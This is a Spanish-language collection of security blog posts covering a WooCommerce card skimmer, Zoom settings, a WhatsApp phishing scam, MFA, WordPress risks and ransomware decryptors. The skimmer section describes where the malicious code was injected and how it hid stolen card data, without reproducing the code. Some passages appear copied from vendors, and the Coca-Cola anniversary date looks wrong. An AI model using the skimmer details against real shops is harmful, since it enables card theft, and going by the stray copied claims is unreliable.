Los expertos de la firma de seguridad Sucuri descubrieron un nuevo software de e-skimmer que es diferente del malware similar utilizado en los ataques de Magecart. El nuevo software skimmed se empleó en ataques a la tienda electrónica basada en WordPress utilizando el complemento WooCommerce.

El e-skimmer no solo intercepta la información de pago proporcionada por los usuarios en los campos de una página de pago.

«Naturalmente, WooCommerce y otros sitios web de comercio electrónico basados ​​en WordPress han sido atacados anteriormente, pero esto normalmente se ha limitado a modificaciones de los detalles de pago dentro de la configuración del complemento». «Por ejemplo, reenviar pagos al correo electrónico de PayPal del atacante en lugar del propietario legítimo del sitio web. Ver una tarjeta de crédito dedicada al deslizar malware en WordPress es algo bastante nuevo «.

Los expertos inicialmente realizaron un escaneo en el sitio web de un cliente y descubrieron puertas traseras genéricas y otro malware. Luego realizaron una verificación de integridad de los archivos principales y arrojaron luz sobre una parte de la infección.

La mayor parte del código JavaScript inyectado se descubrió cerca del final de un archivo JQuery legítimo («./wp-includes/js/jquery/jquery.js»).

«La mayoría de las inyecciones de JavaScript agregan el código al final del archivo, pero una peculiaridad que noté sobre esto fue que se insertó antes de que finalizara jQuery.noConflict ();» continúa el análisis

«No es tan fácil de ver. El hecho de que el malware se haya alojado dentro de un archivo ya existente y legítimo hace que sea un poco más difícil de detectar «.

La técnica es diferente de los ataques Magecart que emplean e-skimmers cargados desde un sitio web de terceros.

La parte del script que captura los detalles de la tarjeta se inyectó en el archivo «./wp-includes/rest-api/class-wp-rest-api.php».

«Como es típico en el malware PHP, se emplean varias capas de codificación y concatenación en un intento de evitar la detección y ocultar su código central del webmaster promedio», continúa la publicación.

El software malicioso recoge los detalles de pago y guarda los números de tarjeta y los códigos de seguridad CVV en texto plano en forma de cookies. El script luego utiliza la función legítima file_put_contents para almacenarlos en dos archivos de imagen separados (un archivo .PNG y un JPEG) que se mantienen en la estructura de directorios wp-content/uploads.

En el momento del análisis, ambos archivos no contenían datos robados, una circunstancia que sugiere que el malware tenía la capacidad de borrar automáticamente los archivos una vez que los atacantes habían adquirido la información.

«Con WooCommerce recientemente superando a todas las demás plataformas de comercio electrónico en popularidad, era solo cuestión de tiempo antes de que empezáramos a ver a los atacantes atacar esta plataforma con más frecuencia», continúa Security.

WooCommerce dijo que este fue el primer caso de este tipo de malware de robo de tarjetas dirigido a WordPress que encontró, pero que han aparecido muchos más desde entonces, y que «los sitios web de WordPress con funciones de comercio electrónico y transacciones en línea seguramente continuarán». ser objetivo en el futuro «.

En abril de 2019, la empresa de seguridad de WordPress «Plugin Vulnerabilities» descubrió una vulnerabilidad crítica en el complemento de WooCommerce que expuso a los sitios web de comercio electrónico basados ​​en WordPress para piratear.

La vulnerabilidad afecta al complemento WooCommerce Checkout Manager que permite a los propietarios de sitios web de comercio electrónico basados ​​en WordPress y ejecutar el complemento WooCommerce personalizar formularios en sus páginas de pago.

Los expertos descubrieron una vulnerabilidad de «carga arbitraria de archivos» que puede ser explotada por atacantes remotos no autenticados cuando los sitios web tienen habilitada la opción «Categorizar archivos cargados» dentro de la configuración del complemento WooCommerce Checkout Manager.

Los expertos de Sucuri recomiendan que los administradores de sitios de WordPress deshabiliten la edición directa de archivos para wp-admin agregando la siguiente línea a su archivo wp-config.php:

define( ‘DISALLOW_FILE_EDIT’, true );

“Esto incluso evita que los usuarios administradores puedan editar directamente archivos desde el panel de control de wp-admin. En el caso de una cuenta de administrador comprometida, esto puede marcar la diferencia entre el atacante que entrega su carga útil o no «. concluye Sucuri.

Si tiene alguna duda o sugerencia no deje de comentar debajo o mediante el formulario de contacto. Si está interesado en mejoras a su sitio web, o un análisis de seguridad también.

Seguridad en Zoom: Como configurarla de manera correcta

Categoría: Seguridad Zoom

Recomendaciones Iniciales

Como primera medida vamos a proceder a abrir un navegador web sin ningún contenido en sus pestañas. Puede ser chrome o firefox, pero que no tenga ninguna pestaña abierta.

Conviene registrarnos a zoom con una cuenta de email temporal (evitar usar cuentas de trabajo y personales, como así también evitar registrar usando google y facebook).
Zoom no deja en claro algunas cuestiones de compartimiento de información.
Para poder registrarnos con una cuenta de email temporal podemos ir a la siguiente url www.temp-mail.org y copiar la dirección que dice debajo del titulo “Your Temporary Email Address”. Con esa dirección de correo nos registramos en zoom.

Zoom nos va a enviar un link de activación y ese link lo vamos a ver en los mensajes en la cuenta temporal (hay que hacer scroll hacia abajo en la pestaña donde tenemos abierto el email temporal).
Con eso evitamos de que zoom comparta nuestros datos con terceros.
Seguidamente ya vamos a tener el email temporal en nuestra cuenta de zoom.

Explicamos cómo puede mejorar enormemente su privacidad y seguridad en Zoom con las opciones de configuración que ofrece la herramienta.

  1. Configurar una reunión en Zoom

Utilice siempre la generación automática: de esta manera cada reunión tendrá un “ID de reunión” diferente. Si el ID de una reunión se ve comprometido, solo servirá para una sola reunión y no para todas las que organice.

Esa contraseña de reunión puede cambiarla cuantas veces quiera. No siempre debe ser la misma

Esto no significa que se necesita una contraseña para unirse a una reunión. El requisito de una contraseña debe permanecer marcado. Sin embargo, para que sea efectiva, la opción de embeber una contraseña debe estar deshabilitada; vea abajo.

Iniciar una reunión con la cámara apagada puede ayudarlo a evitar un momento incómodo. En este sentido, será mejor que los usuarios se vean obligados a encender la cámara durante la reunión si así lo necesitan o desean.

El anfitrión deberá admitir a cada participante en la sala de conferencias. De esta manera, el control total de los asistentes está en manos del anfitrión.
Con el mismo espíritu de comenzar la reunión con la cámara apagada, controlar el encendido del micrófono de los participantes al ingresar significa que no se unirán a la reunión mientras están hablando con alguien más y así se evitarán interrupciones.
Deben considerarse configuraciones adicionales que están disponibles dentro del cliente web en lugar de la aplicación. Después de iniciar sesión en el lado izquierdo, haga clic en la opción ‘Configuración’ que aparece en ‘Personal’. A continuación, detallo las configuraciones que recomiendo modificar de la opción predeterminada.

Desactivar esto elimina la opción de un solo clic y evita que se incruste la contraseña en el enlace de la reunión. Esto significa que cada participante deberá ingresar la contraseña para unirse a la reunión. Establezca esto junto con las opciones de configuración a la hora de crear una reunión que mencionamos anteriormente.

Esto impide que cualquier participante comparta su pantalla, aunque el anfitrión puede pasar el control de la reunión a otro participante al convertirlos en el anfitrión para que pueda compartir su pantalla.

Esta recomendación puede no ser la ideal para todos los escenarios. Por ejemplo, para aquellos que utilicen la herramienta en el campo de la educación puede no ser deseable pasar el control de anfitrión a un estudiante.

Por lo tanto, considere las consecuencias de permitir que todos los participantes puedan compartan la pantalla o si es mejor limitar esta opción solo para
el anfitrión.

Considere desactivar esta opción, ya que permitir ver el fondo real podría funcionar también como una verificación de que el participante no comparte de forma inadvertida contenido confidencial en un lugar público, como puede ser una cafetería.

Consulte la descripción dada anteriormente en la sección ‘configuración de una reunión’.

Los dispositivos iOS de Apple realizan capturas de pantalla de las aplicaciones abiertas para mostrar imágenes en el conmutador de tareas. Habilitar esta opción evita que se visualicen datos confidenciales en el conmutador de tareas.

Pensamientos finales

Las recomendaciones anteriores no reemplazan la necesidad de que el lector revise la política de privacidad de Zoom para asegurarse de que cumpla con sus requisitos.

Tampoco deben considerarse estas sugerencias como una recomendación de mi parte para utilizar este servicio o sus aplicaciones. Las personas y las organizaciones deben tomar sus propias decisiones sobre estos asuntos. Las configuraciones sugeridas arriba son recomendaciones personales basadas en cómo configuraría Zoom en caso de utilizar esta herramienta para realizar una videoconferencia. Espero que sean de ayuda.

Mensaje falso a través de WhatsApp quiere suplantar identidad de Coca Cola

Categoría: Seguridad Whatsapp

Falso mensaje que circula a través de WhatsApp hace creer a los usuarios que Coca Cola está entregando neveras y televisores inteligentes como parte de la celebración de su 135° aniversario.

Existe una campaña de phishing que circula a través de WhatsApp en la que se suplanta la identidad de Coca Cola y que tiene como objetivo desplegar publicidad no deseada en los dispositivos de las víctimas.

Ejemplo del mensaje que llega por WhatsApp a la víctima

El mensaje que llega a los usuarios hace creer que la popular compañía está regalando neveras vintage como parte de la celebración de su 135° aniversario (que en realidad ocurrirá en 2027 según la fecha original de fundación de la empresa).

Lo primero que debería llamar la atención del usuario que recibe este mensaje, en caso de creer que podría tratarse de algo legítimo, es la URL a la cual invita a ingresar, ya que como se puede observar no corresponde a una dirección oficial de la compañía a la que dice representar. A pesar de utilizar el nombre de la misma en la URL, el dominio siempre es el que esta inmediatamente a la izquierda de “.com” o, en este caso, de “.live”.

En caso de que la persona crea en la veracidad de la oferta y haca clic en el enlace se encontrara con la siguiente pantalla:

Sitio al cual redirige la URL en el mensaje

En esta instancia llama la atención la discrepancia que existe entre el mensaje que llega a través de WhatsApp y lo que aparece en la pantalla, ya que ahora se habla no solo de la supuesta nevera, sino de hace referencia a la entrega de un Smart TV, y con un números que no varía a pesar de revisar la campaña luego de varias horas.

Otro aspecto que vale la pena remarcar es que la campaña no solo apunta a usuarios de países de habla hispana, sino que dependiendo del acceso también existe una versión de la misma que apunta a usuarios de países angloparlantes.

Versión en inglés del engaño

Nuevamente observamos que la cantidad de televisores inteligentes que supuestamente se están entregando no varía. Por otra parte, a la derecha se puede observar la encuesta que debe completar la potencial víctima como parte del proceso para obtener el supuesto beneficio.

Encuesta en inglés que el engaño solicita completar.
Ejemplo de las preguntas que realiza la encuesta.
Supuesto proceso de verificación de los datos.

Luego de la supuesta estapa de verificación de las respuestas, la campaña intenta busca que continúe siendo distribuida y para eso obliga a los usuarios a compartir el mensaje a 20 contactos (como mínimo) para poder acceder al supuesto beneficio de un Smart TV (y no a la nevera ofrecida en el mensaje inicial).

El engaño solicita que la víctima comparta la encuesta para recibir el supuesto beneficio.

De esta manera el mensaje no solo llega más rápido y a una mayor audiencia, sino que busca bajar las expectativas de seguridad de los receptores que, en definitiva, están recibiendo un mensaje promocional por parte de una persona conocida.

Luego de analizar la campaña en ambos idiomas, verificamos que busca instalar adware con la finalizad de seguir desplegando publicidad de manera abusiva en los dispositivos que hayan completado todos los pasos de la encuesta.

En la campaña hay dos dominios activos, que tal como se puede observar en la siguiente imagen, fueron registrados recientemente. Ambos presentan similitudes en el nombre, pero lo que seguramente buscan es alojar más engaños utilizando nombre de otras empresas que aún no fueron indexados por los buscadores al momento de analizar esta campaña.

Información del dominio.
 Información del dominio.

Como conclusión, recordamos a los usuarios que para no ser víctimas de engaños de este tipo es importante estar atentos a los mensajes y analizarlos antes de hacer clic en un enlace o compartir el mensaje. Asimismo, recomendamos realizar una búsqueda en Internet para ver comentarios o buscar información sobre la legitimidad de la oferta y si la misma figura en la página oficial, ya que en caso de ser un engaño seguramente alguien ya lo reportó o comentó algo sobre el mismo.

Otras recomendaciones:

  • Desconfíe de las promociones que lleguen a través de medios no oficiales. Las empresas suelen divulgar ofertas y promociones a través de canales oficiales, ya sea el sitio web o las redes sociales.
  • Evite hacer clic en enlaces sospechosos, aunque hayan sido enviados por alguien que usted conozca. Como vimos en este artículo, la propagación de la campaña se hace entre los contactos de la propia víctima.
  • Instale una solución de seguridad confiable en cada uno de los dispositivos conectados a Internet que utilice.
  • Mantenga sus dispositivos actualizados.
  • No comparta información, enlaces o archivos sin estar seguros de su procedencia.

Fuente: We Live Security

Los ejecutivos de IT priorizan la autenticación multifactor en 2020

Categoría: Información Seguridad

En 2020, muchos ejecutivos de IT implementarán o ampliarán su implementación de la autenticación multifactor (MFA) para proteger mejor las identidades. Este es uno de los hallazgos clave de una encuesta realizada por Pulse Q&A para Microsoft en octubre de 2019(1). Específicamente, el 59 por ciento de los ejecutivos implementará o ampliará MFA dentro de tres a seis meses. Otro 26 por ciento lo hará dentro de 12 meses. Estos ejecutivos están iniciando estos proyectos porque creen que MFA proporciona una mejor preparación de seguridad. Tienen razón. MFA, que requiere que los usuarios se autentiquen con al menos dos factores, puede reducir el riesgo de comprometer la identidad hasta en un 99.9 por ciento solo con las contraseñas.

Proteger las identidades es vital para la ciberseguridad. Los malos actores usan identidades comprometidas para establecerse en una organización, evitando la detección durante un promedio de 100 días(2). Históricamente, las organizaciones han confiado en las contraseñas para salvaguardar las identidades, pero las contraseñas por sí solas no son suficientes. El ochenta por ciento de las infracciones relacionadas con la piratería se puede atribuir a contraseñas débiles o comprometidas, según el Informe de investigaciones de violación de datos de 2019 de Verizon. MFA reduce el riesgo porque es significativamente más difícil comprometer dos o más factores de autenticación.

Más allá de las contraseñas, hay varios factores de autenticación diferentes que las organizaciones pueden implementar para proteger mejor sus identidades. Basic MFA aumenta las contraseñas con SMS, contraseñas de un solo uso (OTP) y códigos generados por un dispositivo móvil. Strong MFA utiliza factores de alta seguridad como las claves de seguridad FIDO y las tarjetas inteligentes para autenticar a los usuarios. Los escaneos de huellas digitales, escaneos faciales y otros datos biométricos son métodos de autenticación seguros que pueden simplificar el inicio de sesión para los usuarios. El sesenta y cuatro por ciento de los ejecutivos en la encuesta usa MFA básico. Cuarenta y tres por ciento usa MFA fuerte. La biometría fue citada por el 11 por ciento de los encuestados.

Pero las cosas están cambiando rápidamente. Noventa y uno por ciento de los ejecutivos planean desarrollar su implementación de AMF en el próximo año. El 22% quiere pasar a un MFA fuerte. Otro 13 por ciento migrará hacia la biometría. Una mejor seguridad es el principal impulsor de estos cambios.

2020 es el año para priorizar MFA. Puede reducir significativamente su riesgo de comprometer su identidad aumentando o reemplazando las contraseñas con otros factores de autenticación. Aprenda cómo las organizaciones están utilizando MFA.   

1Pulse Q&A Inc. realizó una investigación para Microsoft en octubre de 2019 con 100 ejecutivos de seguridad y TI en América del Norte que representan 17 sectores de la industria. 
2 El número medio de días que una organización se ve comprometida antes de descubrir una brecha en 2017 es 101 días en comparación con 99 en 2016. Fuente: Informe FireEye M-Trends 2018

Fuente: Microsoft

Mi sitio web es un WordPress. Debo preocuparme?

Categoría: Información Seguridad Wordpress

No descubro nada si digo que wordpress es hoy por hoy el gestor de contenido mas usado en el mundo y con miras de seguir creciendo. Para tener una idea de la dimensión de lo que digo les dejo unas estadísticas.

  • WordPress alimenta el 35% de Internet en 2020, un aumento del 2% en comparación con principios de 2019 y un aumento del 4% con respecto al año anterior.
  • Si solo cuenta los sitios creados por CMS, aproximadamente el 60% de ellos son WordPress
  • Más de 400 millones de personas visitan los sitios de WordPress cada mes
  • En 2019, se publicaron casi 160 mil millones de palabras en WordPress
  • Pero WordPress no es usado solamente para Blogs – Cerca del 28% de todos los ecommerces lo hacen a traves de WooCommerce
  • 305 tiendas nuevas WooCommerce aparecen en promedio en cada día
  • 873 sitios wordpress se agregan diariamente tambien en promedio
  • WordPress ofrece mas de 56000 plugins y mas de 3500 templates con licencia GPL
  • En 2019, los descargas de wordpress, en idioma distinto al inglés, fueron mas las de idioma inglés

Al tener tanto éxito a nivel mundial, también lo es para personas maliciosas que quieren usar los diferentes sitios para sus propósitos (como botnet, como generador de criptomonedas, para robar tarjetas de credito, credenciales, etc).

Si bien las amenazas son muchas también lo son las defensas que la mayoría de los programadores agrega diariamente a sus respectivos códigos, como así también a los plugins y temas usados.

Los principales problemas a la hora de tener un sitio wordpress ejecutando en un servidor y que este sea vulnerable son los siguientes:

Software basico obsoleto:

De todos los sitios wordpress pirateados en el ultimo año el 40% tenia el software basico obsoleto. Las actualizaciones de wordpress se dan generalmente cada 2 semanas. Principalmente pequeñas porciones de codigo son reemplazadas por codigo mas eficiente y seguro. Las grandes actualizaciones son para bugs criticos de seguridad y/o nuevas features.

Plugins o Temas obsoletos:

Una de las cosas que a la gente le encanta de WordPress es el vertiginoso conjunto de plugins y temas disponibles. Al momento de escribir esto, hay más de 56,000 en el repositorio de WordPress, y miles de otros premium adicionales esparcidos por toda la web.

Aunque todas esas opciones son excelentes para ampliar su sitio, cada extensión es una nueva puerta de entrada potencial para un actor malicioso. Y aunque la mayoría de los desarrolladores de WordPress hacen un buen trabajo siguiendo los estándares de código y parcheando cualquier actualización a medida que se las conoce, todavía hay algunos problemas potenciales:

  • Un plugin o tema tiene una vulnerabilidad y, debido a que no hay tantos ojos en él como el software central de WordPress, esa vulnerabilidad pasa desapercibida.
  • El desarrollador ha dejado de trabajar en la extensión pero la gente sigue usándola.
  • El desarrollador rápidamente parchea el problema, pero la gente no lo actualiza.

Entonces, ¿qué tan grande es el problema?

Bueno, en una encuesta de Wordfence de propietarios de sitios web pirateados, más del 60% de los propietarios de sitios web que sabían cómo llegó el hacker lo atribuyeron a un plugin o a una vulnerabilidad temática.

Credenciales de acceso comprometidas para WordPress, FTP o Hosting

Ok, esto no es realmente culpa de WordPress. Pero un porcentaje no despreciable de hacks provienen de actores maliciosos que tienen en sus manos las credenciales de inicio de sesión de WordPress, o las credenciales de inicio de sesión de las cuentas de alojamiento o FTP de los webmasters.

En la misma encuesta de Wordfence, los ataques por fuerza bruta representaron ~16% de los sitios pirateados, con robo de contraseñas, estaciones de trabajo, phishing y cuentas FTP, todos ellos con una apariencia pequeña, pero notable.

Una vez que un actor malicioso recibe la llave metafórica de la puerta principal, no importa qué tan seguro sea su sitio WordPress.

WordPress realmente hace un gran trabajo para mitigar esto generando automáticamente contraseñas seguras, pero todavía depende de los usuarios mantener esas contraseñas seguras y también usar contraseñas fuertes para hospedaje y FTP.

Aporte: Tomar medidas básicas para mantener seguras las credenciales de las cuentas puede evitar que actores maliciosos entren. Use/imponga contraseñas seguras para todas las cuentas de WordPress y limite los intentos de acceso para prevenir ataques de fuerza bruta.

Para cuentas de alojamiento, utilice la autenticación de dos factores si está disponible y nunca almacene su contraseña FTP en texto plano (como hacen algunos programas FTP).

Si puede elegir entre FTP y SFTP (Protocolo de transferencia de archivos SSH), utilice siempre SFTP. Esto asegura que nunca se transfieran contraseñas de texto claro o datos de archivo. Sólo soportamos conexiones seguras en Kinsta.

4. Ataques a la cadena de suministro

Recientemente, ha habido algunos casos en los que los hackers obtienen acceso a los sitios a través de un truco desagradable llamado ataque a la cadena de suministro. Esencialmente, el actor malicioso lo haría:

  • Compra un plugin de alta calidad que se encuentra en WordPress.org
  • Añadir una puerta trasera al código del plugin
  • Espere a que la gente actualice el plugin y luego inyecte la puerta trasera.

Wordfence tiene una explicación más profunda si le interesa. Aunque estos tipos de ataques no están muy extendidos, son más difíciles de prevenir porque resultan de hacer algo que usted debería estar haciendo (mantener un plugin actualizado).

Dicho esto, el equipo de WordPress.org normalmente detecta rápidamente estos problemas y elimina el plugin del directorio.

Aporte: Esto puede ser difícil de prevenir porque es bueno actualizarse siempre a la última versión. Para ayudar, los plugins de seguridad como Wordfence pueden alertarle cuando un plugin es removido de WordPress.org de modo que usted lo dirija rápidamente. Y una buena estrategia de respaldo puede ayudarlo a retroceder sin ningún daño permanente.

5. Entorno de alojamiento deficiente y tecnología obsoleta

Más allá de lo que está sucediendo en su sitio WordPress, su entorno de alojamiento y las tecnologías que utiliza también marcan la diferencia. Por ejemplo, a pesar de que PHP 7 ofrece muchas mejoras de seguridad sobre PHP 5, sólo ~33% de los sitios de WordPress están usando PHP 7 o superior.

Uso de PHP en el sitio web de WordPress. (Fuente de la imagen: WordPress.org)

El soporte de seguridad de PHP 5.6 expiró oficialmente a finales de 2018. Y las versiones anteriores de PHP 5 no han tenido soporte de seguridad durante años.

Esto significa que el uso de un entorno de alojamiento que utiliza PHP 5.6 o inferior le abrió el potencial de vulnerabilidades de seguridad de PHP no parcheadas.

A pesar de ello, un ~28% de los sitios web de WordPress siguen usando versiones PHP por debajo de 5.6, lo que es un gran problema si se tiene en cuenta que recientemente hemos visto años récord para el número de vulnerabilidades PHP descubiertas.

Más allá de darle acceso a las últimas tecnologías, el uso de alojamiento seguro de WordPress también puede ayudarle a mitigar automáticamente muchas de las otras posibles vulnerabilidades de seguridad con:

  • Cortafuegos de aplicaciones web
  • Actualizaciones automáticas para versiones de seguridad
  • Autenticación de dos factores
  • Copias de seguridad automáticas

Aportar: El uso de un entorno de alojamiento seguro y las versiones recientes de tecnologías importantes como PHP ayuda a garantizar aún más que su sitio WordPress permanezca seguro.

¿Quién es responsable de mantener la seguridad de WordPress?

Ahora se estará preguntando, ¿quién es responsable de combatir todos los problemas mencionados anteriormente?

Oficialmente, esa responsabilidad recae en el Equipo de Seguridad de WordPress (aunque los colaboradores y desarrolladores individuales de todo el mundo también juegan un papel importante en mantener la seguridad de WordPress).

El equipo de seguridad de WordPress está formado por «50 expertos, incluidos desarrolladores líderes e investigadores de seguridad». Alrededor de la mitad de estos expertos trabajan en Automattic. Otros trabajan en seguridad web, y el equipo también consulta con investigadores de seguridad y empresas de hosting.

Si está interesado en una visión detallada de cómo funciona el Equipo de Seguridad de WordPress, puede ver la charla de 48 minutos de Aaron Campbell desde WordCamp Europe 2017. Pero en general, el equipo de seguridad de WordPress:

El Equipo de Seguridad de WordPress tiene una política de divulgación que significa que, una vez que han reparado con éxito el fallo y liberado la corrección de seguridad, revelan públicamente el problema (esto es parte de la razón por la que tantos sitios fueron desfigurados en 2017 – todavía no habían aplicado la actualización incluso después de que el equipo de seguridad revelara públicamente el fallo).

Lo que el Equipo de Seguridad de WordPress no hace es revisar todos los temas y plugins en WordPress.org. Los temas y plugins de WordPress.org son revisados manualmente por voluntarios. Pero esa revisión no es «una garantía de que estén libres de vulnerabilidades de seguridad».

Así que – ¿Es WordPress seguro si usted sigue las mejores prácticas?

Si se fijan en todos los datos y hechos anteriores, verán esta tendencia general:

Aunque ningún sistema de gestión de contenidos es 100% seguro, WordPress tiene un aparato de seguridad de calidad para el software principal y la mayoría de los hacks son el resultado directo de que los webmasters no siguen las mejores prácticas de seguridad básicas.

Si hace cosas como….

  • Mantener actualizados el software, los plugins y los temas principales de WordPress.
  • Elegir los plugins y temas sabiamente y sólo instale extensiones de desarrolladores/fuentes de confianza. Cuidado con los clubs GPL y los plugins/temas nulos.
  • Si puede elegir entre FTP y SFTP, utilice siempre SFTP.
  • Utilizar contraseñas seguras para WordPress, así como para sus cuentas de hosting y SFTP (y autenticación de dos factores si está disponible).
  • No usar «admin» para su nombre de usuario.
  • Mantener su propio ordenador libre de virus.
  • Utilizar un certificado TLS (HTTPS) para que toda la comunicación con su sitio de WordPress (como iniciar sesión en su panel de control) esté cifrada.
  • Utilizar las teclas SSH. Esto proporciona una forma más segura de iniciar sesión en un servidor y elimina la necesidad de una contraseña.
  • Elegir un host con un entorno seguro y utilice las últimas tecnologías como PHP 7+.

…entonces WordPress es seguro y su sitio debe permanecer libre de piratas informáticos tanto ahora como en el futuro. Si usted es cliente nuestro, tampoco tiene que preocuparse. Si por casualidad su sitio es pirateado, lo aconsejaremos y le daremos una solución profesional a su sitio web.

No deje de consultarnos. Somos profesionales y expertos en seguridad informática.

¿Qué es un ransomware y cómo se elimina?

Categoría: Información Ransomware Seguridad

El malware de rescate, o ransomware, es un tipo de malware que impide a los usuarios acceder a su sistema o a sus archivos personales y que exige el pago de un rescate para poder acceder de nuevo a ellos. Las primeras variantes de ransomware se crearon al final de la década de los 80, y el pago debía efectuarse por correo postal. Hoy en día los creadores de ransomware piden que el pago se efectúe mediante criptomonedas o tarjetas de crédito.

¿Cómo puede infectarse?

El ransomware puede infectar su ordenador de varias formas. Uno de los métodos más habituales actualmente es a través de spam malicioso, o malspam, que son mensajes no solicitados que se utilizan para enviar malware por correo electrónico. El mensaje de correo electrónico puede incluir archivos adjuntos trampa, como PDF o documentos de Word. También puede contener enlaces a sitios web maliciosos.

El malspam usa ingeniería social para engañar a la gente con el fin de que abra archivos adjuntos o haga clic en vínculos que parecen legítimos, aparentando que proceden de una institución de confianza o de un amigo. Los ciberdelincuentes emplean la ingeniería social en otros tipos de ataques de ransomware, por ejemplo presentarse como el FBI para asustar a los usuarios y obligarles a pagar una suma de dinero por desbloquear los archivos.

Otro método de infección habitual, que alcanzó su pico en 2016, es la publicidad maliciosa. La publicidad maliciosa consiste en el uso de publicidad en línea para distribuir malware con poca interacción por parte del usuario o incluso ninguna. Mientras navegan por la web, incluso por sitios legítimos, los usuarios pueden ser conducidos a servidores delictivos sin necesidad de hacer clic en un anuncio. Estos servidores clasifican los detalles de los ordenadores de las víctimas y sus ubicaciones y, a continuación, seleccionan el malware más adecuado para enviarlo. Frecuentemente, ese malware es ransomware.

Qué hacer si hay infección

La regla número uno si se da cuenta de que se ha infectado con ransomware es no pagar nunca el rescate. (Este es ahora el consejo respaldado por el FBI). Todo lo que conseguiría sería animar a los ciberdelincuentes a lanzar ataques adicionales contra usted o contra otras personas. No obstante, es posible recuperar algunos archivos cifrados mediante desencriptadores gratuitos.

Pero seamos claros: No todas las familias de ransomware disponen de desencriptadores creados para ellas debido, en muchos casos, a que el ransomware usa algoritmos de cifrado avanzados y sofisticados. E incluso si existe un desencriptador, no está siempre claro que sea para la versión correcta del malware. Y no querrá cifrar aún más sus archivos usando el script de descifrado equivocado. Por tanto, debe prestar mucha atención al mensaje de rescate en sí, o incluso solicitar el consejo de un especialista en seguridad/TI antes de intentar nada.

Una de las características básicas de esa amenaza es que una vez que se cifran los archivos por el malware, resulta imposible descifrarlos sin la clave proporcionada por los ciberdelincuentes. Las autoridades y expertos advierten: no es recomendable pagar el rescate. Por varios motivos, uno de ellos es que se financia el cibercrimen, el otro es que no siempre se obtiene dicha clave.

Uno de los problemas a los que nos enfrentamos a la hora de luchar contra este ciberataque es que no existe un único tipo de ransomware, sino muchas familias diferentes, miles. Cada una, requiere su propia clave de descifrado.

Además, también existen distintos tipos de técnicas de ransomware, no todas son iguales. Algunas cifran los archivos, otras bloquean el acceso al terminal… E incluso hay variantes que simulan cifrar los archivos a cambio de dinero, pero no son más que un fraude. Aquí hacemos un repaso de las técnicas más extendidas.

A pesar de esto, no todo está perdido, también hay luz al final del túnel. Las compañías fabricantes de seguridad así como diferentes organizaciones del sector invierten en encontrar soluciones y claves de descifrado de las diferentes familias de ransomware.

Hacemos un repaso de algunas de las herramientas gratuitas para descifrar distintos tipos de ransomware que están a disposición de los usuarios. Si el tipo de ransomware por el que estás afectado aún no se ha logrado descifrar, no desesperes, ten paciencia y puede que en un tiempo den con ella.

Aspecto del mensaje de un ransomware solicitando dinero al usuario para recuperar los archivos.

1. No More Ransom

Este es uno de los proyectos más antiguos creados para proporcionar a los usuarios herramientas para descifrar ransomware. Europol o firmas de seguridad como McAfee están detrás de la iniciativa No More Ransom.

Ofrecen distintos tipos de herramientas que se pueden descargar de forma gratuita para eliminar diferentes versiones de este software malicioso. Muestran por orden alfabético las más de 90 familias de este malware que permite descifrar. También puedes buscar en su buscador si el ransomware que te ha afectado es uno de los que puedes descifrar con sus programas.

777 ransom, Alcatraz, Alpha, Amnesia, Annabelle, Aura, Autolocky, CrySIS, Cryp888, CryptXXX, Damage, Dharma, FilesLocker, Jigsaw Ransom, Linux.Encoder, Popcorn, SNSLocker, Xdata o Xorbat ransom son algunos de los software malicioso que permite descifrar.

2. No Ransom 

Creada por la firma de seguridad Kaspersky Lab, No Ransom es una web en la que encontrarás descifradores para distintas versiones de ransomware gratuitos.

Cuenta con un buscador en el que puedes encontrar si cuentan con la clave para descifrar el ransomware que ha infectado tu equipo.

TeslaCrypt, Rakhni, Rannoh, Shade, CoinVault, Bitcryptor, Wildfire, Xorist o Vandev son algunos de los tipos que puede descifrar.

Antes de usar las herramientas, recomiendan leer la guía de usuario que proveen en su propia web, ya que por ejemplo, es necesario eliminar el malware antes.

3. 360 Ransomware Decryption Tool

La compañía de ciberseguridad 360 cuenta con una herramienta que permite descifrar 80 tipos diferentes de este tipo de software malicioso. Se puede descargar directamente desde esta web, y seguir sus instrucciones.

GandCrab, Petya, Gryphon o GoldenEye son algunos de los ransomware que ayudará a descifrar.

También cuentan con una herramientas específica para descifrar archivos infectados por Wannacry, el famoso ransomware que hizo estragos en empresas de todo el mundo, la herramienta se puedes descargar aquí. 

Esta herramienta funciona en equipos Windows, y puede usarse también como software de prevención o hacer un escaneo de virus en el dispositivo, si se quiere. Si la instalamos en un equipo que ya esté infectado, será necesario hacer antes una copia de los archivos cifrados en un disco duro externo.

4. Ransomware Recognition Tool: para ayudarte a reconocer cuál es

Las anteriores herramientas nos ayudarán si sabemos a ciencia cierta qué tipo de ransomware es el que ha infectado el equipo. Pero, ¿si no estamos seguros?

Esta herramienta creada por Bitdefender: Ransomware Recognition Tool es una aplicación que puede identificar la versión y familia del ransomware del ordenador de la víctima. Posteriormente recomienda la herramienta más apropiada para descifrarla (si existe).

Tan solo hay que descargar y escanear.

5. Más herramientas

ESET es otra de las compañías de seguridad que pone a disposición de los usuarios herramientas gratuitas para poder deshacerte de varios tipos de este software malicioso.

Han lanzado varias, por ejemplo esta herramienta gratuita disponible para descargar para víctimas del ransomware Crysis, pudiendo ayudar a usuarios afectados por seis variantes de este ransomware con las extensiones: .xtbl, .crysis, .crypt, .lock, .crypted y .dharma.

Asimismo, también cuenta con una herramienta gratuita capaz de recuperar los archivos afectados por la familia de ransomware AES-NI, incluyendo XData. Las víctimas de este ransomware, detectado como Win32/Filecoder.AESNI.B y Win32/Filecoder.AESNI.C pueden recuperar sus archivos cifrados.

La firma de seguridad AVG también cuenta con una página en la que actualiza herramientas de descifrado gratuitas para ransomware. Cuentan con software válido para Apocalypse, BadBlock, Bart, Crypt888, Legion, SZFLocker y TeslaCrypt.

¿Cómo usar estas herramientas?

La mayoría de ellas cuentan con guías que explican su funcionamiento. En términos generales, hay que asegurarse primero con qué clase e ransomware estás infectado.

A continuación, tendrás que usar una solución antimalware para deshacerte del software malicioso de tu equipo. La mayoría de las firmas de seguridad cuentan con versiones gratuitas para ello.

Una vez hecho este paso, descarga la herramienta de descifrado, y ejecútala en el equipo para recuperar los archivos cifrados por ransomware.

¿Cómo evitarlo? Prevención y más prevención

Cuando hablamos de ransomware, la información y estar prevenido es fundamental.

Para comenzar, hay que tener cuidado con lo que descargamos de nuestro correo electrónico (los archivos adjuntos no siempre son lo que parecen). Si tenemos dudas, mejor evitar descargarlos en el dispositivo.

De la misma forma, es mejor evitar acceder a enlaces que compartan con nosotros en redes sociales o mensajería instantánea que estén acortados o no conozcamos su procedencia. Las cadenas de mensajes (reenviados), directamente deberíamos obviarlos.

